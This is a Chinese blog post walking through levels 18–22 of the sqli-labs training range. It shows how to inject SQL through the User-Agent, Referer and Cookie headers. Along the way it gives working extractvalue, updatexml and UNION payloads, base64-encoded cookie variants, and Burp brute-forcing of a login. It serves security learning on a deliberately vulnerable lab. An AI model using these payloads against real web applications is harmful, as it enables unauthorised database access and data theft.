sql-lib靶场18-22关总结

最新推荐文章于 2024-07-25 23:12:39 发布
最新推荐文章于 2024-07-25 23:12:39 发布
阅读量132 收藏
点赞数 5
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59023242/article/details/134616436
版权
HEAD注入
流程

注意

  • 进行head注入时,应该知道其中的一个账号密码(可用暴力破解),之后再修改UA头
  • 除了UA头还有referer头,IP头
    • IP头:HTTP_CLIENT_IP、HTTP_X_FORWARDED_FOR、HTTP_X_FORWARDED、HTTP_FORWARDED_FOR、HTTP_FORWARDED

以UA头为例

1.修改UA头报错

User-Agent: 1'

You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the right syntax to use 
near '127.0.0.1', 'admin')' at line 1


insert into 表名(字段,字段,字段) values(,,)
                                      ||        ||             ||
                                      UA        ip           admin
                                      ||        ||             ||
insert into 表名(字段,字段,字段) values(,    '127.0.0.1',   'admin')
                                      ||
                                      1'        
构造SQL语句字段
User-Agent: 123','1','123') #
 ...    ...   ...            values('123','1','123') #,'127.0.0.1','admin')
#重点:构造字段(先要判断有几个字段,字段中含有我们想要的SQL语句,位置在哪个字段都可)
#后面注释掉了原有的 2个字段 ip admin
#所以前面要构造闭合加上 )

2.爆数据库以及其他操作

User-Agent: 123','1'and Extractvalue
('1',concat("~~",database(),"~~")),'123') #

User-Agent: 123','1','123'and Extractvalue
('1',concat("~~",database(),"~~"))) #

User-Agent: 123'and Extractvalue
('1',concat("~~",database(),"~~")),'1','123') #
第18关

注入点:HTTP协议UA头

注入类型:报错注入+UA头

构造闭合符号:单引号'

前提得知一组用户以及密码

方法:暴力破解

  • 使用burp抓包
    在这里插入图片描述

  • 发送到爆破模块
    在这里插入图片描述

  • 配置参数
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • 爆破成功,获取数据
    在这里插入图片描述

  • 检测账号密码,成功登陆
    在这里插入图片描述

进行注入操作

  • 使用正确的账户密码登录,并抓包
    在这里插入图片描述

  • 发送到repeater模块
    在这里插入图片描述

  • 修改UA头,进行爆库以及其他操作

    • payload:
    123','1'and Extractvalue('1',concat("~~",database(),"~~")),'123') #

在这里插入图片描述
在这里插入图片描述

第19关

注入点:HTTP协议Referer头

注入类型:报错注入+Referer头

构造闭合符号:单引号'
在这里插入图片描述

PS:

  • 流程与第18关一致,只不过注入点不同
  • 字段数也不一致,判断方法如下
  • 在这里插入图片描述
  • 在这里插入图片描述
第20关

注入点:cookie

注入类型:报错注入+cookie注入

构造闭合符号:单引号'

方法:

  • burp抓包修改Cookie

    • 注意,修改Cookie的时候,需要将请求体的内容删掉:uname=admin&passwd=1&submit=Submit
    • 再添加payload: Cookie: uname=admin'and updatexml(1,concat(0x7E,(database()),0x7E),1) #
    • 添加cookie的时候位置要在请求头中(1-16行),不能在请求头中(19行)
    • 18行作用:隔开请求头与请求体,不能删除
      在这里插入图片描述
      在这里插入图片描述

  • 网页控制台进行cookie操作

    • payload:document.cookie="uname=admin'and updatexml(1,concat(0x7E,(database()),0x7E),1) #"
    • 输入payload之后,enter提交,刷新页面即可
      在这里插入图片描述
      在这里插入图片描述
第21关

注入点:cookie

注入类型:cookie注入+base64+union联合查询

构造闭合符号:单引号+括号')

方法:

  • burp抓包修改

    • payload

      • ') union select 1,group_concat(schema_name),3 from information_schema.schemata #

      • Cookie: (转码后)
uname=JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHNjaGVtYV9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhICM=

  • 网页控制台进行cookie操作

    • payload

      • document.cookie="uname=JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHNjaGVtYV9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhICM="

PS:

  • 流程基本与第20关一致,闭合符号不同
  • 需要使用base64转码
第22关

注入点:cookie

注入类型:cookie注入+base64+union联合查询

构造闭合符号:双引号"

方法:

  • burp抓包修改

    • payload

      • " union select 1,group_concat(schema_name),3 from information_schema.schemata #

      • Cookie: (转码后)
uname=IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoc2NoZW1hX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgIw==

  • 网页控制台进行cookie操作

    • payload

      • document.cookie="uname=IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoc2NoZW1hX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgIw=="

PS:

  • 流程基本与第20关一致,闭合符号不同
  • 需要使用base64转码
灮迦
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
docker搭建sqli-labs靶场
songling515010475的专栏
08-19 621
1、启动docker [root@localhost ~]# service docker start Redirecting to /bin/systemctl start docker.service 2、搜索sqli-labs镜像 [root@localhost ~]# docker search sqli-labs NAME DESCRIPTION STARS OF
sqli-laba靶场搭建
不眠的博客
01-08 1650
phpstudy_pro\WWW\sqli\sqli-labs-master\sql-connections下的db-creds.inc文件进行编辑。最后提醒一下,在docker搭建该靶场,在闭docker容器或者虚拟机机sqli数据库会丢失。点击创建数据库,重新访问192.168.121.129 (IP+8002)将下载好的靶场解压在phpstudy的www目录(根目录)下。将sqli-labs映射到本地的8002端口运行。搭建完成开始你的黑客学习旅程吧!将sqli-labs部署到本地。
sqli-lab靶场18基于post的头部信息报错注入
qq_46527080的博客
12-18 610
知识点 $_SERVER['HTTP_USER_AGENT']。 这是用来检查浏览页面的访问者在用什么浏览器.   其中需要检查用户的 agent 字符串,它是浏览器发送的 HTTP 请求的一部分。   如:var_dump($_SERVER['HTTP_USER_AGENT']);   输出:string(65) "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Fire 通过查看源码看到,是一个insert的语句,我们通过构造updatexml
sql-lib靶场搭建-windows操作系统
liguangyao213的博客
01-26 3177
下载phpstudy,下载地址:Windows版phpstudy下载 - 小皮面板(phpstudy) 下载完成,解压后文件目录如下:: 双击exe文件进行快速安装即可进行安装: 安装完成后双击图标,面板显示为下图: 到此phpstudy安装完成,下一步进行sql-lib靶场下载,下载地址:https://github.com/Audi-1/sqli-labs 下载完成后将解压文复制到phpstudy的WWW目录下,默认安装情况下phpstudy的目录路径为C:\php..
在线靶场-墨者-SQL注入1星-SQL手工注入漏洞测试(MySQL数据库)
weixin_42079912的博客
07-18 2588
尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入 order by 获取字段数为4 and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处 and 1=2 union select 1,version(),database(),4 爆库得到 and 1=2 union select 1,ve...
sqli-lib靶场1-15教程
m0_56109788的博客
04-25 1172
sqli-lib靶场1-15教程
【SQLI-Lab】靶场搭建
xinyue9966的博客
01-19 1222
SQLI靶场的搭建简言下载链接系统选择WindowsLinux访问方式本机内访问外部访问IP地址最终安装 简言 选择SQLI练习个人靶场搭建,是SQL注入学习的一种良好的方式,我也想针对目前的sql注入学习,做一个良好的检验效果,同时方便对每一个对渗透学习感兴趣的人整理一份学习笔记,留做参考。 下载链接 链接: SQLI下载. 系统选择 Windows 将文件解压到个人安装的集成环境网站根目录下,比如在C盘Program Files (x86)中安装phpstudy,那么你的根目录即为C:\Program
渗透学习-SQL注入篇-靶场-Sql-lib详细的解决过程(1-65的个人解决思路 2022.6.8 )
qq_43696276的博客
05-04 5068
在经过上一篇的sql基础学习后,以下将正式进入靶场的学习与训练当中。本文以下将进行对sql-libs靶场的学习,1-65全攻略。
运维搭建CTFd在线靶场
想练武,就得下功夫
06-09 2627
CentOS7.2搭建ctfd靶场平台 参考 先有一台CentOS7.2无界面的 2核4G内存30G磁盘 然后网络桥接模式 配置CentOS7的yum源为阿里的 1、安装git yum provides git yum -y install git 2、安装pip(有坑) CentOS默认python2.7.5环境,不支持pip [root@localhost ~]# python -V Python 2.7.5 [root@localhost ~]# pip -V -bash: pip: 未
web及sql-lib靶场初级
weixin_44351992的博客
10-31 450
一、攻防世界WEB新手练习区 1.view_source F12(开发者模式)???。。。啰嗦 源代码解决!!! 2.robots 注:摘自Robots协议是什么? (biancheng.net) 所以答案就有了(绿框框) ,是一个.php,打开它!!! 3.backup 注:.bak为人为保存 下载后打开即可!!! 4.cookie 查看cookie:开发者模式-内存-cookie 查看ht...
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 815
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 403
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 269
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQL 注入漏洞详解 - Union 注入
Toasten
07-23 1060
SQL 注入即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。
在 Windows 上安装 PostgreSQL
the_beginner的博客
07-24 440
选择额外的安装项(这里我选了一个JDBC驱动包,方便DBeaver访问)安装界面会指定服务程序和库两个路径,可以自己手动选择。官网直接提供exe安装包,没有手动安装的压缩包。
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 497
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
spring —— 事务管理器
最新发布
firstgrass的博客
07-25 541
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 261
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
sql-lab靶场下载
10-17
您可以在以下网址下载sql-lab靶场:https://github.com/Audi-1/sqli-labs 下载完成后,您可以按照README文件中的说明进行安装和使用。 相问题: 1. sql-lab靶场是什么?...3. 如何使用sql-lab靶场
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值